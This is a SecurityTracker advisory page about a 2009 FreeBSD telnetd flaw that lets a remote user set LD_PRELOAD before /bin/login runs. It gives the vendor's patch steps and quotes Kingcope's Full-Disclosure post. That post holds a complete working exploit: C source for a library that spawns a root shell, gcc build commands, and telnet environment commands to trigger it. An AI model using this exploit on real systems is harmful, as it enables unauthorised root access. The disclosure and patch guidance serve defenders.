SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   Telnet Vendors:   FreeBSD
FreeBSD telnetd Environment Variable Validation Flaw Lets Remote Users Execute Code
SecurityTracker Alert ID:  1021732
SecurityTracker URL:  http://securitytracker.com/id/1021732
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Feb 17 2009
Original Entry Date:  Feb 16 2009
Impact:   Execution of arbitrary code via network, Root access via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in FreeBSD telnetd. A remote user can execute code on the target system.

A remote user can connect via telnet and send a specially crafted environment variable to cause the target system to execute the code on the target system that was referenced by the environment variable.

Kingcope reported this vulnerability.

Impact:   A remote user can execute code on the target system.
Solution:   The vendor has provided the following solution instructions [quoted]:

Perform one of the following:

1) Upgrade your vulnerable system to 7-STABLE, or to the RELENG_7_1 or
RELENG_7_0 security branch dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 7.0 and 7.1
systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-09:05/telnetd.patch
# fetch http://security.FreeBSD.org/patches/SA-09:05/telnetd.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/libtelnet
# make obj && make depend && make
# cd /usr/src/libexec/telnetd
# make obj && make depend && make && make install

The vendor's advisory is available at:

http://security.freebsd.org/advisories/FreeBSD-SA-09:05.telnetd.asc

Vendor URL:  security.freebsd.org/advisories/FreeBSD-SA-09:05.telnetd.asc (Links to External Site)
Cause:   Input validation error
Underlying OS:   UNIX (FreeBSD)

Message History:   None.


 Source Message Contents

Date:  Sat, 14 Feb 2009 03:46:07 +0100
Subject:  [Full-disclosure] FreeBSD zeroday

FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation -
And possible remote root code excution.

There is a rather big bug in the current FreeBSD telnetd daemon.
The environment is not properly sanitized when execution /bin/login,
what leads to a (possible) remote root hole.

The telnet protocol allows to pass environment variables inside the
telnet traffic and assign them to the other side of the tcp connection.
The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD)
environment variables prior to executing /bin/login.
So passing an environment variable with the identifier LD_PRELOAD and
the value of a precompiled library that is on the filesystem of the
victims box that includes malicious code is possible.
When /bin/login is executed with the user id and group id 0 ('root') it preloads
the library that was set by remote connection through a telnet environment
definition and executes it.
It is unlikely that this bug can be exploited remotely but is not impossible.
An attacker could f.e. upload a malicious library using ftp (including anonymous
 ftp users), nfs, smb or any other (file) transfer protocol.
One scenario to exploit the bug remotely would be a ftp server running beside
the telnet daemon serving also anoynmous users with write access. Then the
attacker would upload the malicious library and defines the LD_PRELOAD
variable to something similar to /var/ftp/mallib.so to gain remote root access.

Here comes the actual exploit which can be executed with standard UNIX tools.
Paste this into a file using your favorite text editor:
---snip-----
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        FILE *f;
        setenv("LD_PRELOAD", "", 1);
        system("echo ALEX-ALEX;/bin/sh");
}
---snip-----

Then we compile this stuff.

---snip-----
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o
-nostartfiles
---snip-----

Then we copy the file to a known location (local root exploit)

---snip-----
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-----

...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.

---snip-----
#telnet
>auth disable SRA
>environ define LD_PRELOAD /tmp/libno_ex.so.1.0
>open target
---snip-----
ALEX-ALEX
#ROOTSHELL

This will give us an immediate (probably remote) root shell.
This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install
with telnetd enabled. Other version of FreeBSD may also be affected,
OpenBSD and NetBSD where not tested but MAY contain the same bug because
of historic reasons.

Signed,
Kingcope[nikolaos rangos]/2009

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC